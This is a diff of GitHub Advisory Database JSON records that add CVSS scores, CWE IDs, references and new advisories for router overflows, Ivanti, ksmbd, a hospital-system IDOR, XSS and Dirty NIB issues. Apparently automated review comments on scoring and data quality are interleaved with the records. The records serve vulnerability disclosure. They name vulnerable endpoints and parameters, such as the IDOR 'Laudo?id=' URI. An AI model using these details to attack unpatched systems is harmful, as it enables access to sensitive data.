--- a/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json +++ b/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://github.com/eeenvik1/CVE-2023-51764" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00020.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JQ5WXFCW2N6G2PH3JXDTYW5PH5EBQEGO/" diff --git a/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json b/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json index fdf23cac2ad83..760ec8b6b24a8 100644 --- a/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json +++ b/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j5r4-2mjg-6xcc", - "modified": "2023-12-18T18:30:21Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-12-18T18:30:21Z", "aliases": [ "CVE-2023-6817" @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13" diff --git a/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json b/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json index afb298f6fe38a..979a446b65ae3 100644 --- a/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json +++ b/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6r8-x8pp-9mcq", - "modified": "2023-12-27T00:30:25Z", + "modified": "2024-02-01T18:31:07Z", "published": "2023-12-20T21:30:35Z", "aliases": [ "CVE-2023-49272" diff --git a/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json b/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json index 623565c8b42f9..5eefaf0250f33 100644 --- a/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json +++ b/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json b/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json index d6bddff316b6b..5eb36c14348a4 100644 --- a/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json +++ b/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6610" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-6610" diff --git a/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json b/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json index 58743a69ed3ed..846c7d069c8b5 100644 --- a/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json 
+++ b/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m2ff-6895-cr34", - "modified": "2023-12-19T15:30:30Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-12-19T15:30:30Z", "aliases": [ "CVE-2023-6932" @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json b/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json index 8a3b1928ee9de..6f90298a7a567 100644 --- a/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json +++ b/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36880" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json b/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json index 0c1f6e85456b2..0c5df152caa35 100644 --- a/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json +++ b/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42890" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT214035" @@ -60,6 +64,10 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2023/Dec/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/12/18/1" } ], "database_specific": { 
diff --git a/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json b/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json index 21c96f0d1bb9c..b9e22356616cf 100644 --- a/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json +++ b/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json b/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json index ec946494bf0fc..a5133271257a7 100644 --- a/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json +++ b/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json @@ -17,13 +17,25 @@ ], "references": [ + { + "type": "WEB", + "url": "https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45779" }, + { + "type": "WEB", + "url": "https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html" + }, { "type": "WEB", "url": "https://source.android.com/security/bulletin/2023-12-01" + }, + { + "type": "WEB", + "url": "https://www.fairphone.com/en/2024/01/30/security-update-apex-modules-vulnerability-fixed/" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json b/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json index e8c2f3384a3e3..13b7ac88f2dc9 100644 --- a/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json 
+++ b/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json @@ -101,6 +101,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-December/003435.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0003/" diff --git a/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json b/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json index 67ff919089080..3f1322c0ab3cb 100644 --- a/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json +++ b/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json b/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json new file mode 100644 index 0000000000000..d5db83dc9058b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2348-p6m3-vqc4", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0995" + ], + "details": "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been rated as critical. Affected by this issue is the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0995" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252260" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252260" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json b/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json index a230dbe92e443..0214af8cedef2 100644 --- a/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json +++ b/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json 
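Review bot: The details text says the issue "has been rated as critical", but the vector in the same record (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) is driven down by PR:H and the record's own `severity` field is HIGH, so a consumer reading the prose and the field gets two different answers; the prose is the VulDB wording and should not be used for triage. The record also states that the exploit is public and that the vendor never responded, and `affected` is an empty array, so there is no `fixed` event to wait for — every Tenda W6 1.0.0.9(4122) device should be treated as unpatched. A short note in the review trail saying "no vendor fix; severity comes from the CVSS field, not the description" would save downstream readers the same reconciliation.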
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-23p4-xxgc-xqvf", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2021-42143" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-835" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json b/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json new file mode 100644 index 0000000000000..6eacc33f20332 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json 
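Review bot: The `cwe_ids` added in the second hunk lists only CWE-835, but the details also describe "a buffer over-read that can disclose sensitive information", and the C:H component of the new vector reflects exactly that second effect; the weakness list should carry both, `"cwe_ids": ["CWE-125", "CWE-835"]`. The affected statement is "through master branch 53a0d97" with no fixed version, so the record cannot express a remediation for consumers of this tinyDTLS fork; that is worth stating explicitly rather than leaving the reader to infer it from the absence of a `fixed` event. The CRITICAL value in `database_specific.severity` is consistent with the vector (C:H/I:N/A:H, unauthenticated, network).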
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24gf-6m5f-h6pg", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-21888" + ], + "details": "A privilege escalation vulnerability in web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21888" + }, + { + "type": "WEB", + "url": "https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json b/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json index 0744846873488..49e5c81b9140d 100644 --- a/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json +++ b/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json 
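Review bot: `cwe_ids` is an empty array on this new record, so any weakness-based filter will miss a privilege-escalation-to-administrator issue that the record itself rates HIGH; it should be populated once NVD assigns a CWE rather than shipped blank indefinitely. Two smaller data points that will surface in exact-match diffing of this database: the details string ends with a trailing space (`...that of an administrator. `), and the vector is tagged `CVSS:3.0` while the other new records in this batch use `CVSS:3.1`. Both are upstream artefacts, but trimming the details string at sync time is harmless and avoids the stray whitespace propagating to every consumer.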
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2572-4xw7-mcfc", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-22705" ], "details": "An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-125" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json b/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json new file mode 100644 index 0000000000000..3912683c662ac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json 
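Review bot: The vector added here (AV:L/AC:L/PR:L) describes a local, low-privilege attack, which looks inconsistent with the details: smb2_get_data_area_len in fs/smb/server/smb2misc.c parses SMB2 requests inside the in-kernel SMB server, a component reached over the network by clients. This is NVD's scoring and not something the sync can correct, but a line in the review trail noting that the HIGH rating may understate network exposure would help consumers; verify the AV component against the NVD record before relying on it. The fixed version (6.6.10) appears only in the prose in this hunk; the `affected` array is not visible here, so whether a machine-readable range exists cannot be confirmed from this diff.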
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-257p-qfc7-7ff5", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-23747" + ], + "details": "The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23747" + }, + { + "type": "WEB", + "url": "https://github.com/louiselalanne/CVE-2024-23747" + }, + { + "type": "WEB", + "url": "https://modernasistemas.com.br/sitems/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json b/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json new file mode 100644 index 0000000000000..10f3a4095f214 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25g8-7mhh-fm84", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7200" + ], + "details": "The EventON WordPress plugin before 4.4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7200" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/586cf0a5-515c-43ea-8c03-f2f47ed13c2c/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json b/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json index c7cb4c2db6f10..7bb027be1abe9 100644 --- a/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json +++ b/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-25vp-v4qh-h9xj", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-22662" ], "details": "TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T15:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json b/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json new file mode 100644 index 0000000000000..a00d15a5ff4ac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2798-r58g-fffv", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-21916" + ], + "details": "\nA denial-of-service vulnerability exists in specific Rockwell Automation ControlLogix ang GuardLogix controllers. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21916" + }, + { + "type": "WEB", + "url": "https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json b/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json new file mode 100644 index 0000000000000..96d825d78bcac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json 
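Review bot: The details string of the new Rockwell record begins with a literal `\n` and contains the typo "ControlLogix ang GuardLogix" (should be "and"); both come through from the upstream text, and the leading newline will render as a blank first line in any consumer that prints `details` verbatim. Suggested value: `"details": "A denial-of-service vulnerability exists in specific Rockwell Automation ControlLogix and GuardLogix controllers. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF."`, applied at the source feed so the next sync does not overwrite it. The record names no affected firmware versions and `affected` is empty, so "specific ... controllers" is the only scoping a consumer gets; the SD1661 reference is presumably where the version list lives, and it would be worth confirming before relying on this record for matching.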
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27hv-w8j5-r6ww", + "modified": "2024-02-06T21:30:25Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2024-23745" + ], + "details": "In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23745" + }, + { + "type": "WEB", + "url": "https://github.com/louiselalanne/CVE-2024-23745" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T02:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json b/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json index 337c7350025a4..50af38ed314ab 100644 --- a/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json +++ b/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json 
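Review bot: The vector on this record (AV:N/AC:L/PR:N/UI:N) claims an unauthenticated network attack, but the details describe a Dirty NIB attack — a .nib file inside the installed application being modified — which presupposes the attacker can already write to the application bundle on the local machine. That mismatch is what pushes `severity` to CRITICAL; it is upstream scoring, but a note in this database's review trail that triage should follow the description rather than the vector would prevent the record from being ranked above genuinely remote issues. The only reference is a personal GitHub write-up and `affected` is empty, so the record carries no fixed version and no vendor statement.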
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-288h-h8hx-vvqm", - "modified": "2024-01-24T00:30:33Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-24T00:30:33Z", "aliases": [ "CVE-2024-23453" ], "details": "Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-798" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json b/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json index 8a2be85d38b3a..60f04edaa6b72 100644 --- a/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json +++ b/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-28jc-7xfh-6mvp", - "modified": "2024-01-25T03:30:59Z", + "modified": "2024-02-02T06:30:31Z", "published": "2024-01-25T03:30:59Z", "aliases": [ "CVE-2024-0625" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json b/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json new file mode 100644 index 0000000000000..102aad5d2e2af --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json 
